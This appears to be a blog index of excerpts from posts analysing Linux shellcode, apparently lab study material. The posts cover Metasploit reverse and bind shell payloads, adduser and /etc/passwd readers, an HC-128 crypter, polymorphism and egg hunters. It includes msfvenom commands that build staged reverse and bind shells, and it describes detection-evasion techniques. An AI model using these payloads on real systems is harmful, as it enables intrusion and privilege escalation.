HC-128 Shellcode Crypter (x64)

In this post I will introduce a custom shellcode crypter based on the HC-128 cipher. Introduction to HC-128 cipher: the HC-128 algorithm is a software-efficient, synchronous symmetric stream cipher designed by Hongjun Wu. The cipher uses a 128-bit key and a 128-bit initialization vector. I will use the HC-128 library developed in the ECRYPT II project and a simple stack execve shellcode. /bin/sh execve …

Analysis of Metasploit linux/x64/shell/reverse_tcp shellcode

linux/x64/shell/reverse_tcp staged shellcode generally consists of the following steps: map 4096 bytes in the process' VAS memory; create a socket and connect it to the remote address and port; wait for incoming data and save it into the mapped memory; execute the saved data. Shellcode demonstration: create an elf64 executable with msfvenom: $ msfvenom -p linux/x64/shell/reverse_tcp -f elf -a x64 --platform linux LHOST=127.1.1.2 LPORT=5555 -o staged_reverse_tcp Set up …

Analysis of Metasploit linux/x64/exec shellcode

linux/x64/exec utilizes the -c flag of the system command interpreter (i.e. dash on Ubuntu systems) and executes the given command in a non-login, non-interactive session. Importantly, the given command is executed as a string operand instead of being read from stdin. Consider the following shell command: $ sudo echo "foo" >> /etc/passwd bash: /etc/passwd: Permission denied The above redirection will not work because sudo is …

Analysis of Metasploit linux/x64/shell/bind_tcp shellcode

linux/x64/shell/bind_tcp staged shellcode generally consists of the following steps: create a listening port and wait for a connection; map 4096 bytes in the process' VAS memory; wait for incoming data and save it into the mapped memory; execute the saved data. Shellcode demonstration: create an elf64 executable with msfvenom: $ msfvenom -p linux/x64/shell/bind_tcp -f elf -a x64 --platform linux LPORT=1234 -o staged_bind_tcp_x64 Execute the stager: $ chmod …

Shellcode Polymorphism Examples

In this blog post I will transform three Linux Intel x86 shellcodes via polymorphic patterns. 1. Linux/x86 Force Reboot shellcode. Link to original shellcode: http://shell-storm.org/shellcode/files/shellcode-831.php Original shellcode with analysis: this shellcode executes the /sbin/reboot command via the execve() system call stack method. Shellcode length is 36 bytes. Mutated shellcode with analysis: the mutated shellcode has a size of 54 bytes, which is 50% more …

Analysis of Metasploit linux/x86/shell_find_port shellcode

This post analyses the innards of the linux/x86/shell_find_port shellcode. This shellcode spawns a shell on an established connection. Initial shellcode overview and testing: inspect payload options and generate shellcode for analysis. The linux/x86/shell_find_port payload has one option; we will keep CPORT set to the default value 40746. Insert the generated shellcode into the testing C wrapper. Shellcode analysis: using libemu sctest gives an infinite loop; strace output …

Analysis of Metasploit linux/x86/read_file shellcode

This post analyses the innards of the linux/x86/read_file shellcode. This shellcode reads a file from the local file system and writes it back out to the specified file descriptor. Initial shellcode overview and testing: inspect payload options and generate shellcode for analysis. The linux/x86/read_file payload has two options; we will keep FD set to 1 (STDOUT) and set the path to /etc/passwd. At first glance the …

Analysis of Metasploit linux/x86/adduser shellcode

This post analyses the innards of the linux/x86/adduser shellcode. Running this shellcode adds a custom user with UID=0 to /etc/passwd. Initial shellcode overview and testing: inspect payload options and generate shellcode for analysis. The linux/x86/adduser payload has three options; we will generate shellcode with a custom user and password. Insert the generated shellcode into the testing C wrapper. Running the shellcode as a sudoer we get a new user someusr …

Egg Hunters on Linux

In this blog post I will discuss egg hunters: what egg hunters are, and why and how to use them. Before I dive into the realm of egg hunters it will be convenient to quickly recap the basics of the VAS (Virtual Address Space) model for the Linux platform. VAS – Virtual Address Space: for every running process a 4GB virtual memory space is created which …